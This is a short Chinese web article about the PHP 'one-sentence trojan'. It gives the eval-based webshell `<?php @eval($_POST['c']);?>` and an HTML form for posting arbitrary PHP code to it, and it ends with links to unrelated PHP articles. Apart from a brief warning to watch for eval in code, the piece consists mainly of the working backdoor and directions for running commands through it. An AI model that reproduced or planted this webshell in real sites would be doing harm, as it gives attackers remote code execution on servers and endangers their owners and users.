php eval函数一句话木马代码
更新时间:2015年05月21日 11:03:25 投稿:hebedich
这个是php常见的一句话木马的源码,通过post木马程序来实现木马的植入,eval()函数把字符串按照PHP代码来计算。该字符串必须是合法的PHP代码,且必须以分号结尾。如果没有在代码字符串中调用return语句,则返回NULL。如果代码中存在解析错误,则eval()函数返回false。
eval可以用来执行任何其他php代码,所以对于代码里发现了eval函数一定要小心,可能是木马
就这一句话害死人,这样任何人都可以post任何文件上来,所以要做好防范
<?php @eval($_POST['c']);?>
使用方法也很简单,本地提交文件指向提交文件,里面的php代码就会被执行
<html>
<body>
<form action="a.php" method="post">
<input type="text" name="c" value="phpinfo();">
<input type="submit" value="submit">
</form>
</body>
</html>
以上所述就是本文的全部内容了,希望大家能够喜欢。
相关文章
几种有用的变型 PHP中循环语句的用法介绍
for语句可以说是PHP(同时也是多种语言)的循环控制部份最基本的一个语句了,for语句的执行规律和基础用法在这里就不多说,可以参见PHP手册for语句部分
2012-01-01
PHP封装的PDO数据库操作类实例
这篇文章主要介绍了PHP封装的PDO数据库操作类,结合具体实例形式分析了php基于PDO针对数据库的增删改查、事务、批量添加等相关操作技巧,需要的朋友可以参考下
2017-06-06
PHP封装的非对称加密RSA算法示例
这篇文章主要介绍了PHP封装的非对称加密RSA算法,结合实例形式分析了php实现的RSA加密算法类及其相关使用技巧,需要的朋友可以参考下
2018-05-05
谨慎使用PHP的引用原因分析
PHP中也引入了引用类型,在对对象赋值传递上,基本可视为是同于Java/C#的引用传递(具体请见Objects and references)。但同时又支持在基础类型上通过引用运算符(&)来获得内容的引用。不过在实际的使用中,PHP的引用类型因为整个PHP设计结构而存在着许多的问题,使得在程序出现非预计的结果
2012-09-09
php的dl函数用法实例
这篇文章主要介绍了php的dl函数用法,以实例形式讲述了利用dl函数突破PHP设置上的限制,是非常实用的技巧,需要的朋友可以参考下
2014-11-11
PHP判断一个字符串是否是回文字符串的方法
这篇文章主要介绍了PHP判断一个字符串是否是回文字符串的方法,实例分析了php操作字符串判断回文的技巧,具有一定参考借鉴价值,需要的朋友可以参考下
2015-03-03
php7新特性的理解和比较总结
在本文里我们给大家整理了关于php7新特性的理解和比较以及相关实例代码内容,正在学习的朋友们参考下。
2019-04-04
PHP重载基础知识回顾
这篇文章主要介绍了PHP重载的相关知识,帮助大家更好的理解和复习php,感兴趣的朋友可以了解下
2020-09-09
最新评论